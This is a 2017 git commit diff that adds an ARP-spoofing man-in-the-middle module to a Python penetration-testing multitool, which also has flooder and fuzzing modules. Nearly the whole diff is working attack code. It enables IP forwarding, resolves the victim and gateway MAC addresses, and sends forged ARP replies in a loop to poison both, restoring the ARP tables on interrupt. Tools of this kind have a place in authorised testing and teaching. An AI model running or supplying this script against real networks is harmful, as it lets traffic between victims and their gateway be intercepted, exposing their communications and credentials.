Add mitm script

Fernando Fernández · Fernando Fernández · commit 620439d5855e · 2017-05-03T00:05:50.000+02:00
Added a mitm script ready for attack by ARP Spoofing
diff --git a/pentesting-multitool.py b/pentesting-multitool.py
@@ -1,7 +1,7 @@
 #! /usr/bin/env python3
 
 import sys
-from utility_scripts import dns_utility, whois_utility, shodan_utility, bannergrab_utility, flooder_utility, fuzzing_utility
+from utility_scripts import dns_utility, whois_utility, shodan_utility, bannergrab_utility, flooder_utility, fuzzing_utility, mitm_utility
 
 def main():
     if len(sys.argv) < 2:
@@ -35,8 +35,12 @@ def main():
     elif sys.argv[1] == "fuzzing":
         fuzzing_utility.fuzzing_attack()
 
+    elif sys.argv[1] == "mitm":
+        mitm_utility.mitm_attack()
+
     else:
         print('Unknown function, please use -h for show the avaliable methods.')
+        exit()
 
 if __name__ == '__main__':
     main()
diff --git a/utility_scripts/mitm_utility.py b/utility_scripts/mitm_utility.py
@@ -6,13 +6,20 @@
 
 class mitm_attack(object):
 
+    def check(self):
+        if len(sys.argv) != 5:
+            print('Usage: python pentesting-multitool.py mitm <interface> <victim IP> <gateway IP>')
+            exit()
+
     def settings_values(self):
 
         # Setting values
         self.interface = sys.argv[2]
         self.victimIP = sys.argv[3]
         self.gatewayIP = sys.argv[4]
 
+        # Disabling verbose mode
+        conf.verb = 0
 
     def mac_getter(self, IP):
 
@@ -34,4 +41,47 @@ def ARPing(self):
         # Disabling IP Forwarding
         os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
 
-        exit()
+        exit()
+
+    def sending_arp(self):
+
+        victim = self.mac_getter(self.victimIP)
+        AP_MAC = self.mac_getter(self.gatewayIP)
+
+        # Those replies places us between them (ARP Spoofing)
+        send(ARP(op=2, pdst=self.victimIP, psrc=self.gatewayIP, hwdst=victim))
+        send(ARP(op=2, pdst=self.gatewayIP, psrc=self.victimIP, hwdst=AP_MAC))
+
+    def main_attack(self):
+
+        print("Enabling IP Forwarding...\n")
+        os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
+
+        try:
+            victimMAC = self.mac_getter(self.victimIP)
+            AP_MAC = self.mac_getter(self.gatewayIP)
+
+        except:
+            print("Cannot find targets MAC address")
+            os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
+            sys.exit(1)
+
+        print("Poisoning Targets...")
+        while 1:
+            try:
+                self.sending_arp()
+                print("Packets successfully sent..")
+                time.sleep(1)
+            except KeyboardInterrupt:
+                print("Aborting mitm attack..")
+                self.ARPing()
+                break
+
+    def __init__(self):
+        self.check()
+        self.settings_values()
+
+        # Attack
+
+        self.main_attack()
+
